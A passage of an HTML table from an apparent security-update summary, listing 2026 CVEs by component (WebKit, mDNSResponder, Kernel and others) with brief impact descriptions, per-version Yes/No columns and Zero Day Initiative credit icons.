    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28987" target="_blank">CVE-2026-28987</a></td>
    <td>Kernel</td>
    <td>An app may be able to leak sensitive kernel state</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28983" target="_blank">CVE-2026-28983</a></td>
    <td>LaunchServices</td>
    <td>A remote attacker may be able to cause a denial of service</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28929" target="_blank">CVE-2026-28929</a></td>
    <td>Mail Drafts</td>
    <td>Replying to an email could display remote images in Mail in Lockdown Mode</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43653" target="_blank">CVE-2026-43653</a></td>
    <td>mDNSResponder</td>
    <td>An attacker on the local network may be able to cause a denial-of-service</td>
    <td>Yes</td>
    <td>No</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28985" target="_blank">CVE-2026-28985</a></td>
    <td>mDNSResponder</td>
    <td>An attacker on the local network may be able to cause a denial-of-service</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43668" target="_blank">CVE-2026-43668</a></td>
    <td>mDNSResponder</td>
    <td>A remote attacker may be able to cause unexpected system termination or corrupt kernel memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43666" target="_blank">CVE-2026-43666</a></td>
    <td>mDNSResponder</td>
    <td>An attacker on the local network may be able to cause a denial-of-service</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><img title="Reported through Zero Day Initiative" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMTAgMTY3Ij4KICA8IS0tIEhvcm5zIC0tPgogIDxwYXRoIGQ9Ik04NSA0IFE3NCA2IDcyIDE4IEw4MCAyMCBRNzkgMTIgODcgOFoiIGZpbGw9IiMxQjJBNEEiLz4KICA8cGF0aCBkPSJNMTI1IDQgUTEzNiA2IDEzOCAxOCBMMTMwIDIwIFExMzEgMTIgMTIzIDhaIiBmaWxsPSIjMUIyQTRBIi8+CiAgPCEtLSBIZWFkIC0tPgogIDxlbGxpcHNlIGN4PSIxMDUiIGN5PSIyMiIgcng9IjE4IiByeT0iMTIiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIExlZnQgdXBwZXIgYXJtIC0tPgogIDxwYXRoIGQ9Ik03MiAzMCBMNTggNDQgTDYzIDQ4IEw3OCAzNVoiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIFJpZ2h0IHVwcGVyIGFybSAtLT4KICA8cGF0aCBkPSJNMTM4IDMwIEwxNTIgNDQgTDE0NyA0OCBMMTMyIDM1WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gWWVsbG93IGJvd3RpZSBsZWZ0IC0tPgogIDxwYXRoIGQ9Ik03NiAzOCBROTAgMzIgMTA1IDM4IFE5MCA0NCA3NiAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIFllbGxvdyBib3d0aWUgcmlnaHQgLS0+CiAgPHBhdGggZD0iTTEzNCAzOCBRMTIwIDMyIDEwNSAzOCBRMTIwIDQ0IDEzNCAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIEJsdWUgY2hlc3QgLS0+CiAgPGVsbGlwc2UgY3g9IjEwNSIgY3k9IjQ2IiByeD0iMTQiIHJ5PSIxMCIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSBsZWZ0IHdpbmcgLS0+CiAgPHBhdGggZD0iTTkxIDU0IFE2MCA1OCAxOCA3NSBRMTAgNjggMTQgNjIgUTUwIDUyIDkxIDU0WiIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSByaWdodCB3aW5nIC0tPgogIDxwYXRoIGQ9Ik0xMTkgNTQgUTE1MCA1OCAxOTIgNzUgUTIwMCA2OCAxOTYgNjIgUTE2MCA1MiAxMTkgNTRaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBHb2xkIGxlZnQgd2luZ3RpcCAtLT4KICA8cGF0aCBkPSJNMTQgNjIgUTQgNjIgMTAgNTQgUTE2IDU4IDE4IDc1WiIgZmlsbD0iI0Y1QjgwMCIvPgogIDwhLS0gR29sZCByaWdodCB3aW5ndGlwIC0tPgogIDxwYXRoIGQ9Ik0xOTYgNjIgUTIwNiA2MiAyMDAgNTQgUTE5NCA1OCAxOTIgNzVaIiBmaWxsPSIjRjVCODAwIi8+CiAgPCEtLSBMb3dlciBib2R5IGxlZnQgc3RydXQgLS0+CiAgPHBhdGggZD0iTTkwIDYyIEw3NiA4NiBMODQgOTAgTDk3IDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gTG93ZXIgYm9keSByaWdodCBzdHJ1dCAtLT4KICA8cGF0aCBkPSJNMTIwIDYyIEwxMzQgODYgTDEyNiA5MCBMMTEzIDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gQmx1ZSB0ZWFyZHJvcCBhYmRvbWVuIC0tPgogIDxwYXRoIGQ9Ik0xMDUgNjggUTExOCA4MiAxMDUgMTA4IFE5MiA4MiAxMDUgNjhaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBMZWZ0IGxvd2VyIGxlZyAtLT4KICA8cGF0aCBkPSJNODAgMTAwIEw2MCAxMTIgTDYyIDExOCBMODQgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gUmlnaHQgbG93ZXIgbGVnIC0tPgogIDxwYXRoIGQ9Ik0xMzAgMTAwIEwxNTAgMTEyIEwxNDggMTE4IEwxMjYgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgo8L3N2Zz4="><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28941" target="_blank">CVE-2026-28941</a></td>
    <td>Model I/O</td>
    <td>Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>No</td>
  </tr>
  <tr>
    <td><img title="Reported through Zero Day Initiative" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMTAgMTY3Ij4KICA8IS0tIEhvcm5zIC0tPgogIDxwYXRoIGQ9Ik04NSA0IFE3NCA2IDcyIDE4IEw4MCAyMCBRNzkgMTIgODcgOFoiIGZpbGw9IiMxQjJBNEEiLz4KICA8cGF0aCBkPSJNMTI1IDQgUTEzNiA2IDEzOCAxOCBMMTMwIDIwIFExMzEgMTIgMTIzIDhaIiBmaWxsPSIjMUIyQTRBIi8+CiAgPCEtLSBIZWFkIC0tPgogIDxlbGxpcHNlIGN4PSIxMDUiIGN5PSIyMiIgcng9IjE4IiByeT0iMTIiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIExlZnQgdXBwZXIgYXJtIC0tPgogIDxwYXRoIGQ9Ik03MiAzMCBMNTggNDQgTDYzIDQ4IEw3OCAzNVoiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIFJpZ2h0IHVwcGVyIGFybSAtLT4KICA8cGF0aCBkPSJNMTM4IDMwIEwxNTIgNDQgTDE0NyA0OCBMMTMyIDM1WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gWWVsbG93IGJvd3RpZSBsZWZ0IC0tPgogIDxwYXRoIGQ9Ik03NiAzOCBROTAgMzIgMTA1IDM4IFE5MCA0NCA3NiAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIFllbGxvdyBib3d0aWUgcmlnaHQgLS0+CiAgPHBhdGggZD0iTTEzNCAzOCBRMTIwIDMyIDEwNSAzOCBRMTIwIDQ0IDEzNCAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIEJsdWUgY2hlc3QgLS0+CiAgPGVsbGlwc2UgY3g9IjEwNSIgY3k9IjQ2IiByeD0iMTQiIHJ5PSIxMCIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSBsZWZ0IHdpbmcgLS0+CiAgPHBhdGggZD0iTTkxIDU0IFE2MCA1OCAxOCA3NSBRMTAgNjggMTQgNjIgUTUwIDUyIDkxIDU0WiIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSByaWdodCB3aW5nIC0tPgogIDxwYXRoIGQ9Ik0xMTkgNTQgUTE1MCA1OCAxOTIgNzUgUTIwMCA2OCAxOTYgNjIgUTE2MCA1MiAxMTkgNTRaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBHb2xkIGxlZnQgd2luZ3RpcCAtLT4KICA8cGF0aCBkPSJNMTQgNjIgUTQgNjIgMTAgNTQgUTE2IDU4IDE4IDc1WiIgZmlsbD0iI0Y1QjgwMCIvPgogIDwhLS0gR29sZCByaWdodCB3aW5ndGlwIC0tPgogIDxwYXRoIGQ9Ik0xOTYgNjIgUTIwNiA2MiAyMDAgNTQgUTE5NCA1OCAxOTIgNzVaIiBmaWxsPSIjRjVCODAwIi8+CiAgPCEtLSBMb3dlciBib2R5IGxlZnQgc3RydXQgLS0+CiAgPHBhdGggZD0iTTkwIDYyIEw3NiA4NiBMODQgOTAgTDk3IDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gTG93ZXIgYm9keSByaWdodCBzdHJ1dCAtLT4KICA8cGF0aCBkPSJNMTIwIDYyIEwxMzQgODYgTDEyNiA5MCBMMTEzIDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gQmx1ZSB0ZWFyZHJvcCBhYmRvbWVuIC0tPgogIDxwYXRoIGQ9Ik0xMDUgNjggUTExOCA4MiAxMDUgMTA4IFE5MiA4MiAxMDUgNjhaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBMZWZ0IGxvd2VyIGxlZyAtLT4KICA8cGF0aCBkPSJNODAgMTAwIEw2MCAxMTIgTDYyIDExOCBMODQgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gUmlnaHQgbG93ZXIgbGVnIC0tPgogIDxwYXRoIGQ9Ik0xMzAgMTAwIEwxNTAgMTEyIEwxNDggMTE4IEwxMjYgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgo8L3N2Zz4="><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28940" target="_blank">CVE-2026-28940</a></td>
    <td>Model I/O</td>
    <td>Processing a maliciously crafted image may corrupt process memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28961" target="_blank">CVE-2026-28961</a></td>
    <td>Network Extensions</td>
    <td>An attacker with physical access to a locked device may be able to view sensitive user information</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28906" target="_blank">CVE-2026-28906</a></td>
    <td>Networking</td>
    <td>An attacker may be able to track users through their IP address</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28840" target="_blank">CVE-2026-28840</a></td>
    <td>PackageKit</td>
    <td>An app may be able to gain root privileges</td>
    <td>No</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43656" target="_blank">CVE-2026-43656</a></td>
    <td>Quick Look</td>
    <td>Parsing a maliciously crafted file may lead to an unexpected app termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43652" target="_blank">CVE-2026-43652</a></td>
    <td>Sandbox</td>
    <td>An app may be able to access protected user data</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39870" target="_blank">CVE-2026-39870</a></td>
    <td>SceneKit</td>
    <td>Processing a maliciously crafted image may corrupt process memory</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28846" target="_blank">CVE-2026-28846</a></td>
    <td>SceneKit</td>
    <td>A remote attacker may be able to cause unexpected app termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28993" target="_blank">CVE-2026-28993</a></td>
    <td>Shortcuts</td>
    <td>An app may be able to access user-sensitive data</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28848" target="_blank">CVE-2026-28848</a></td>
    <td>SMB</td>
    <td>A remote attacker may be able to cause unexpected system termination</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28930" target="_blank">CVE-2026-28930</a></td>
    <td>Spotlight</td>
    <td>An app may be able to access protected user data</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28974" target="_blank">CVE-2026-28974</a></td>
    <td>Spotlight</td>
    <td>An app may be able to cause a denial-of-service</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28996" target="_blank">CVE-2026-28996</a></td>
    <td>Storage</td>
    <td>An app may be able to access sensitive user data</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28919" target="_blank">CVE-2026-28919</a></td>
    <td>StorageKit</td>
    <td>An app may be able to gain root privileges</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28924" target="_blank">CVE-2026-28924</a></td>
    <td>Sync Services</td>
    <td>An app may be able to access Contacts without user consent</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39871" target="_blank">CVE-2026-39871</a></td>
    <td>TV App</td>
    <td>An app may be able to observe unprotected user data</td>
    <td>Yes</td>
    <td>Yes</td>
    <td>Yes</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28976" target="_blank">CVE-2026-28976</a></td>
    <td>UserAccountUpdater</td>
    <td>An app may be able to gain root privileges</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43660" target="_blank">CVE-2026-43660</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may prevent Content Security Policy from being enforced</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28907" target="_blank">CVE-2026-28907</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may prevent Content Security Policy from being enforced</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28962" target="_blank">CVE-2026-28962</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may disclose sensitive user information</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43658" target="_blank">CVE-2026-43658</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28905" target="_blank">CVE-2026-28905</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><img title="Reported through Zero Day Initiative" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMTAgMTY3Ij4KICA8IS0tIEhvcm5zIC0tPgogIDxwYXRoIGQ9Ik04NSA0IFE3NCA2IDcyIDE4IEw4MCAyMCBRNzkgMTIgODcgOFoiIGZpbGw9IiMxQjJBNEEiLz4KICA8cGF0aCBkPSJNMTI1IDQgUTEzNiA2IDEzOCAxOCBMMTMwIDIwIFExMzEgMTIgMTIzIDhaIiBmaWxsPSIjMUIyQTRBIi8+CiAgPCEtLSBIZWFkIC0tPgogIDxlbGxpcHNlIGN4PSIxMDUiIGN5PSIyMiIgcng9IjE4IiByeT0iMTIiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIExlZnQgdXBwZXIgYXJtIC0tPgogIDxwYXRoIGQ9Ik03MiAzMCBMNTggNDQgTDYzIDQ4IEw3OCAzNVoiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIFJpZ2h0IHVwcGVyIGFybSAtLT4KICA8cGF0aCBkPSJNMTM4IDMwIEwxNTIgNDQgTDE0NyA0OCBMMTMyIDM1WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gWWVsbG93IGJvd3RpZSBsZWZ0IC0tPgogIDxwYXRoIGQ9Ik03NiAzOCBROTAgMzIgMTA1IDM4IFE5MCA0NCA3NiAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIFllbGxvdyBib3d0aWUgcmlnaHQgLS0+CiAgPHBhdGggZD0iTTEzNCAzOCBRMTIwIDMyIDEwNSAzOCBRMTIwIDQ0IDEzNCAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIEJsdWUgY2hlc3QgLS0+CiAgPGVsbGlwc2UgY3g9IjEwNSIgY3k9IjQ2IiByeD0iMTQiIHJ5PSIxMCIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSBsZWZ0IHdpbmcgLS0+CiAgPHBhdGggZD0iTTkxIDU0IFE2MCA1OCAxOCA3NSBRMTAgNjggMTQgNjIgUTUwIDUyIDkxIDU0WiIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSByaWdodCB3aW5nIC0tPgogIDxwYXRoIGQ9Ik0xMTkgNTQgUTE1MCA1OCAxOTIgNzUgUTIwMCA2OCAxOTYgNjIgUTE2MCA1MiAxMTkgNTRaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBHb2xkIGxlZnQgd2luZ3RpcCAtLT4KICA8cGF0aCBkPSJNMTQgNjIgUTQgNjIgMTAgNTQgUTE2IDU4IDE4IDc1WiIgZmlsbD0iI0Y1QjgwMCIvPgogIDwhLS0gR29sZCByaWdodCB3aW5ndGlwIC0tPgogIDxwYXRoIGQ9Ik0xOTYgNjIgUTIwNiA2MiAyMDAgNTQgUTE5NCA1OCAxOTIgNzVaIiBmaWxsPSIjRjVCODAwIi8+CiAgPCEtLSBMb3dlciBib2R5IGxlZnQgc3RydXQgLS0+CiAgPHBhdGggZD0iTTkwIDYyIEw3NiA4NiBMODQgOTAgTDk3IDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gTG93ZXIgYm9keSByaWdodCBzdHJ1dCAtLT4KICA8cGF0aCBkPSJNMTIwIDYyIEwxMzQgODYgTDEyNiA5MCBMMTEzIDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gQmx1ZSB0ZWFyZHJvcCBhYmRvbWVuIC0tPgogIDxwYXRoIGQ9Ik0xMDUgNjggUTExOCA4MiAxMDUgMTA4IFE5MiA4MiAxMDUgNjhaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBMZWZ0IGxvd2VyIGxlZyAtLT4KICA8cGF0aCBkPSJNODAgMTAwIEw2MCAxMTIgTDYyIDExOCBMODQgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gUmlnaHQgbG93ZXIgbGVnIC0tPgogIDxwYXRoIGQ9Ik0xMzAgMTAwIEwxNTAgMTEyIEwxNDggMTE4IEwxMjYgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgo8L3N2Zz4="><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28847" target="_blank">CVE-2026-28847</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28904" target="_blank">CVE-2026-28904</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><img title="Reported through Zero Day Initiative" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyMTAgMTY3Ij4KICA8IS0tIEhvcm5zIC0tPgogIDxwYXRoIGQ9Ik04NSA0IFE3NCA2IDcyIDE4IEw4MCAyMCBRNzkgMTIgODcgOFoiIGZpbGw9IiMxQjJBNEEiLz4KICA8cGF0aCBkPSJNMTI1IDQgUTEzNiA2IDEzOCAxOCBMMTMwIDIwIFExMzEgMTIgMTIzIDhaIiBmaWxsPSIjMUIyQTRBIi8+CiAgPCEtLSBIZWFkIC0tPgogIDxlbGxpcHNlIGN4PSIxMDUiIGN5PSIyMiIgcng9IjE4IiByeT0iMTIiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIExlZnQgdXBwZXIgYXJtIC0tPgogIDxwYXRoIGQ9Ik03MiAzMCBMNTggNDQgTDYzIDQ4IEw3OCAzNVoiIGZpbGw9IiMxQjJBNEEiLz4KICA8IS0tIFJpZ2h0IHVwcGVyIGFybSAtLT4KICA8cGF0aCBkPSJNMTM4IDMwIEwxNTIgNDQgTDE0NyA0OCBMMTMyIDM1WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gWWVsbG93IGJvd3RpZSBsZWZ0IC0tPgogIDxwYXRoIGQ9Ik03NiAzOCBROTAgMzIgMTA1IDM4IFE5MCA0NCA3NiAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIFllbGxvdyBib3d0aWUgcmlnaHQgLS0+CiAgPHBhdGggZD0iTTEzNCAzOCBRMTIwIDMyIDEwNSAzOCBRMTIwIDQ0IDEzNCAzOFoiIGZpbGw9IiNGNUI4MDAiLz4KICA8IS0tIEJsdWUgY2hlc3QgLS0+CiAgPGVsbGlwc2UgY3g9IjEwNSIgY3k9IjQ2IiByeD0iMTQiIHJ5PSIxMCIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSBsZWZ0IHdpbmcgLS0+CiAgPHBhdGggZD0iTTkxIDU0IFE2MCA1OCAxOCA3NSBRMTAgNjggMTQgNjIgUTUwIDUyIDkxIDU0WiIgZmlsbD0iIzNEQjdFNCIvPgogIDwhLS0gQmx1ZSByaWdodCB3aW5nIC0tPgogIDxwYXRoIGQ9Ik0xMTkgNTQgUTE1MCA1OCAxOTIgNzUgUTIwMCA2OCAxOTYgNjIgUTE2MCA1MiAxMTkgNTRaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBHb2xkIGxlZnQgd2luZ3RpcCAtLT4KICA8cGF0aCBkPSJNMTQgNjIgUTQgNjIgMTAgNTQgUTE2IDU4IDE4IDc1WiIgZmlsbD0iI0Y1QjgwMCIvPgogIDwhLS0gR29sZCByaWdodCB3aW5ndGlwIC0tPgogIDxwYXRoIGQ9Ik0xOTYgNjIgUTIwNiA2MiAyMDAgNTQgUTE5NCA1OCAxOTIgNzVaIiBmaWxsPSIjRjVCODAwIi8+CiAgPCEtLSBMb3dlciBib2R5IGxlZnQgc3RydXQgLS0+CiAgPHBhdGggZD0iTTkwIDYyIEw3NiA4NiBMODQgOTAgTDk3IDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gTG93ZXIgYm9keSByaWdodCBzdHJ1dCAtLT4KICA8cGF0aCBkPSJNMTIwIDYyIEwxMzQgODYgTDEyNiA5MCBMMTEzIDY2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gQmx1ZSB0ZWFyZHJvcCBhYmRvbWVuIC0tPgogIDxwYXRoIGQ9Ik0xMDUgNjggUTExOCA4MiAxMDUgMTA4IFE5MiA4MiAxMDUgNjhaIiBmaWxsPSIjM0RCN0U0Ii8+CiAgPCEtLSBMZWZ0IGxvd2VyIGxlZyAtLT4KICA8cGF0aCBkPSJNODAgMTAwIEw2MCAxMTIgTDYyIDExOCBMODQgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgogIDwhLS0gUmlnaHQgbG93ZXIgbGVnIC0tPgogIDxwYXRoIGQ9Ik0xMzAgMTAwIEwxNTAgMTEyIEwxNDggMTE4IEwxMjYgMTA2WiIgZmlsbD0iIzFCMkE0QSIvPgo8L3N2Zz4="><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28955" target="_blank">CVE-2026-28955</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28903" target="_blank">CVE-2026-28903</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28953" target="_blank">CVE-2026-28953</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28902" target="_blank">CVE-2026-28902</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28901" target="_blank">CVE-2026-28901</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28913" target="_blank">CVE-2026-28913</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28883" target="_blank">CVE-2026-28883</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28958" target="_blank">CVE-2026-28958</a></td>
    <td>WebKit</td>
    <td>An app may be able to access sensitive user data</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28917" target="_blank">CVE-2026-28917</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected process crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28947" target="_blank">CVE-2026-28947</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28946" target="_blank">CVE-2026-28946</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28942" target="_blank">CVE-2026-28942</a></td>
    <td>WebKit</td>
    <td>Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
    <td>Yes</td>
    <td>No</td>
    <td>No</td>
  </tr>
  <tr>
    <td><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28971" target="_blank">CVE-2026-28971</a></td>
    <td>WebKit</td>
    <td>A malicious iframe may use another website's download settings</td>
    <td>Yes</td>
    <td>No</td>
